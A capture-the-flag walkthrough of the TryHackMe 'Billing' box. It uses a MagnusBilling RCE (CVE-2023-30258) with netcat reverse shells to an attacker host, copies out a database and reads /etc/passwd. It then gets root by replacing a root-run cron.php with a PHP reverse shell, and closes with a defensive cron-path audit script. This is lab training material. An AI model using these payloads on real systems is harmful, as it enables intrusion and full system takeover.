Billing
Port scan
┌──(root㉿7)-[~/thm/Billing]
└─# nmap -A 10.10.15.214
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-25 20:33 CST
Nmap scan report for 10.10.15.214
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://10.10.15.214/mbilling/
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan
┌──(root㉿7)-[~/thm/Billing]
└─# dirsearch -u http://10.10.15.214/mbilling/ -i 200
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/thm/Billing/reports/http_10.10.15.214/_mbilling__25-03-25_20-38-45.txt
Target: http://10.10.15.214/
[20:38:45] Starting: mbilling/
[20:40:03] 200 - 410B - /mbilling/assets/
[20:40:22] 200 - 4KB - /mbilling/CONTRIBUTING.md
[20:40:24] 200 - 0B - /mbilling/cron.php
[20:40:49] 200 - 332B - /mbilling/index.php
[20:40:57] 200 - 597B - /mbilling/lib/
[20:40:57] 200 - 7KB - /mbilling/LICENSE
[20:41:09] 200 - 2KB - /mbilling/modern.json
[20:41:09] 200 - 2KB - /mbilling/modern.jsonp
[20:41:33] 200 - 2KB - /mbilling/README.md
[20:41:36] 200 - 0B - /mbilling/resources/
[20:41:59] 200 - 408B - /mbilling/tmp/
MBilling 6.0.0.0
CVE-2023-30258 applies to this version and gives RCE
n00o00b/CVE-2023-30258-RCE-POC: POC for CVE-2023-30258-RCE by n0o0b
Generate reverse shells with a reverse shell generator and try them one by one; some of them do not work.
python poc.py -u http://10.10.30.117/mbilling --cmd "nc -c sh 10.21.126.163 8888"
Upgrade to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
[CTRL+Z]
stty raw -echo
fg
The database file astdb.sqlite3 is found in the home directory
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd ~
asterisk@Billing:/var/lib/asterisk$ ls
agi-bin firmware moh scripts third-party
astdb.sqlite3 images phoneprov sounds
documentation keys rest-api static-http
asterisk@Billing:/var/lib/asterisk$ python3 -m http.server 6666
Serving HTTP on 0.0.0.0 port 6666 (http://0.0.0.0:6666/) ...
10.21.126.163 - - [25/Mar/2025 07:30:22] "GET /astdb.sqlite3 HTTP/1.1" 200 -
After downloading it, it turns out to be encrypted.
/etc/passwd shows a user named magnus
asterisk@Billing:/var/lib/asterisk$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
tss:x:103:109:TPM software stack,,,:/var/lib/tpm:/bin/false
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:105:111:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:110:116:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
pulse:x:112:118:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
magnus:x:1000:1000:magnus,,,:/home/magnus:/bin/bash
asterisk:x:1001:1001:Asterisk PBX:/var/lib/asterisk:/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:117:125::/nonexistent:/usr/sbin/nologin
mysql:x:118:126:MySQL Server,,,:/nonexistent:/bin/false
user.txt is -rw-r--r--, so magnus's flag can be read directly
asterisk@Billing:/var/lib/asterisk$ cd /home/*
asterisk@Billing:/home/magnus$ ls -al
total 76
drwxr-xr-x 15 magnus magnus 4096 Sep 9 2024 .
drwxr-xr-x 3 root root 4096 Mar 27 2024 ..
lrwxrwxrwx 1 root root 9 Mar 27 2024 .bash_history -> /dev/null
-rw------- 1 magnus magnus 220 Mar 27 2024 .bash_logout
-rw------- 1 magnus magnus 3526 Mar 27 2024 .bashrc
drwx------ 10 magnus magnus 4096 Sep 9 2024 .cache
drwx------ 11 magnus magnus 4096 Mar 27 2024 .config
drwx------ 3 magnus magnus 4096 Sep 9 2024 .gnupg
drwx------ 3 magnus magnus 4096 Mar 27 2024 .local
-rwx------ 1 magnus magnus 807 Mar 27 2024 .profile
drwx------ 2 magnus magnus 4096 Mar 27 2024 .ssh
drwx------ 2 magnus magnus 4096 Mar 27 2024 Desktop
drwx------ 2 magnus magnus 4096 Mar 27 2024 Documents
drwx------ 2 magnus magnus 4096 Mar 27 2024 Downloads
drwx------ 2 magnus magnus 4096 Mar 27 2024 Music
drwx------ 2 magnus magnus 4096 Mar 27 2024 Pictures
drwx------ 2 magnus magnus 4096 Mar 27 2024 Public
drwx------ 2 magnus magnus 4096 Mar 27 2024 Templates
drwx------ 2 magnus magnus 4096 Mar 27 2024 Videos
-rw-r--r-- 1 magnus magnus 38 Mar 27 2024 user.txt
asterisk@Billing:/home/magnus$ cat user.txt
THM{4a6831d5f124b25eefb1e92e0f0da4ca}
Try sudo privilege escalation
asterisk@Billing:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on Billing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on Billing:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Looking at the fail2ban-client usage, several subcommands take a <CMD> argument
COMMAND ACTION CONFIGURATION
set <JAIL> action <ACT> actionstart <CMD>   sets the start command <CMD> of the action <ACT> for <JAIL>
set <JAIL> action <ACT> actionstop <CMD>    sets the stop command <CMD> of the action <ACT> for <JAIL>
set <JAIL> action <ACT> actioncheck <CMD>   sets the check command <CMD> of the action <ACT> for <JAIL>
set <JAIL> action <ACT> actionban <CMD>     sets the ban command <CMD> of the action <ACT> for <JAIL>
set <JAIL> action <ACT> actionunban <CMD>   sets the unban command <CMD> of the action <ACT> for <JAIL>
pspy64 shows a cron job that keeps running /bin/sh -c php /var/www/html/mbilling/cron.php
cron.php is owned by root and we have no write permission on it
asterisk@Billing:/var/www/html/mbilling$ ls -l /var/www/html/mbilling/cron.php
-rwxr-xr-x 1 root root 0 Sep 12 2024 /var/www/html/mbilling/cron.php
But the directory containing it is owned by asterisk
dr-xr-xr-x 36 asterisk asterisk 4096 Sep 12 2024 .
Give the directory write permission
asterisk@Billing:/var/www/html/mbilling$ chmod 777 .
asterisk@Billing:/var/www/html/mbilling$ ls -la .
total 67012
drwxrwxrwx 36 asterisk asterisk 4096 Sep 12 2024 .
With a writable directory, cron.php can be deleted even though the file itself is root-owned.
Then write a new cron.php containing a reverse shell
echo "<?=\`nc -c sh 10.21.126.163 9999\`;?>" >cron.php
Listen for the callback
┌──(root㉿7)-[~/thm/Billing]
└─# nc -lvvp 9999
listening on [any] 9999 ...
10.10.30.117: inverse host lookup failed: Unknown host
connect to [10.21.126.163] from (UNKNOWN) [10.10.30.117] 47194
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
THM{33ad5b530e71a172648f424ec23fae60}
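The root shell came from a directory-permission gap, not from cron.php itself: cron executed a root-owned file, but its parent directory /var/www/html/mbilling was owned by asterisk, who could chmod it and replace the file. The audit below is an added example (not part of this writeup or of MagnusBilling) that walks every absolute path in a root cron command and flags any component owned by a non-root uid or group/world-writable; SAMPLE_FS is constructed from the ls and passwd output above (asterisk is uid 1001), and stat_lookup is the hypothetical live-host backend.

```python
import os
import re
import stat
from typing import Callable, NamedTuple, Optional


class PathInfo(NamedTuple):
    uid: int   # owner uid
    mode: int  # permission bits only (no file-type bits)


# Constructed from the writeup's ls/passwd output: asterisk is uid 1001.
SAMPLE_FS = {
    "/var": PathInfo(0, 0o755),
    "/var/www": PathInfo(0, 0o755),
    "/var/www/html": PathInfo(0, 0o755),
    "/var/www/html/mbilling": PathInfo(1001, 0o555),        # dr-xr-xr-x asterisk
    "/var/www/html/mbilling/cron.php": PathInfo(0, 0o755),  # -rwxr-xr-x root
}


def stat_lookup(path: str) -> Optional[PathInfo]:
    """Lookup backed by the live filesystem, for running the audit on a real host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return PathInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def controllable_by_non_root(info: PathInfo) -> bool:
    # A non-root owner can chmod the entry at will (exactly what happened above),
    # and group/world write bits let others replace its contents outright.
    return info.uid != 0 or bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_path(path: str, lookup: Callable[[str], Optional[PathInfo]]) -> list:
    """Flag the file and every ancestor directory that a non-root user controls."""
    parts = path.rstrip("/").split("/")
    findings = []
    for depth in range(2, len(parts) + 1):
        component = "/".join(parts[:depth])
        info = lookup(component)
        if info is not None and controllable_by_non_root(info):
            kind = "file" if depth == len(parts) else "directory"
            findings.append(f"{kind} {component} uid={info.uid} mode={oct(info.mode)}")
    return findings


def audit_root_cron(cmd: str, lookup=stat_lookup) -> dict:
    """Audit every absolute path in a root cron command; returns only paths with findings."""
    paths = re.findall(r"/[A-Za-z0-9_./-]+", cmd)
    return {p: f for p in paths if (f := check_path(p, lookup))}
```

Run audit_root_cron over each root crontab entry with the default stat_lookup; any non-empty result means the job's code can be swapped by the flagged owner, so the fix is root ownership of the whole path (or moving the script out of the web root).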